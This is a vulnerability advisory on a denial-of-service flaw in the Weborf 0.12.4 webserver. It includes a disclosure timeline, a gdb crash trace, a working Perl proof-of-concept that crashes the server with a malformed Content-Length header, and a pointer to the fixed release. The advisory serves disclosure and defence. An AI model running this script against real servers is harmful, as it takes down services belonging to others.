[Discussion]

- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]

- Weborf-0.12.4 (Denial-of-Service)

[Vendor Product Description]

- Weborf is a lightweight webserver designed to rapidly share
directories. Runs on POSIX systems.

- Source: http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.4.tar.gz

[Advisory Timeline]

- 01/27/2011 -> Advisory sent to vendor.
- 01/27/2011 -> Vendor response. (Requesting more information)
- 01/27/2011 -> Full debug analysis and exploit sent.
- 01/28/2011 -> Vendor response. (Acknowledged and fixed the bug)
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Wrong parsing in Content-Length entity-header.

[Impact]

- Low

[Affected Version]

- 0.12.4
- Prior versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]

- The webserver crashes due to an error when handling certain HTTP
fields. This could be exploited to terminate an affected server via
e.g. specially crafted HTTP headers containing wide characters.

(gdb) bt
#0  0xb7ec8bd1 in memcpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x0804dec5 in get_param_value (
   http_param=0x805af95 "HTTP/1.1\r\nHost:
http://www.dclabs.com.br\r\nContent-Length0\r\n",
   parameter=0x804fe79 "Content-Length", buf=0xb3e46095 "", size=15,
param_len=14) at utils.c:281
#2  0x0804cfa1 in read_post_data (sock=0, connection_prop=0xb3e462f8,
read_b=0xb3e462d4) at instance.c:1173
#3  0x00000000 in ?? ()

[PoC]

# Weborf-0.12.4 (Denial of Service)
#!/usr/bin/perl
use IO::Socket;
        if (@ARGV < 1) {
                usage();
        }
        $ip     = $ARGV[0];
        $port   = $ARGV[1];
        print "[+] Sending request...\n";
        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
        print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";
        print $socket "Host: http://www.dclabs.com.br\r\n";
        print $socket "Content-Length0\r\n\r\n";
        sleep(1);
        close($socket);
        print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
        exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

Upgrade to the latest version at:
http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.5.tar.gz

[Greetz]
DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br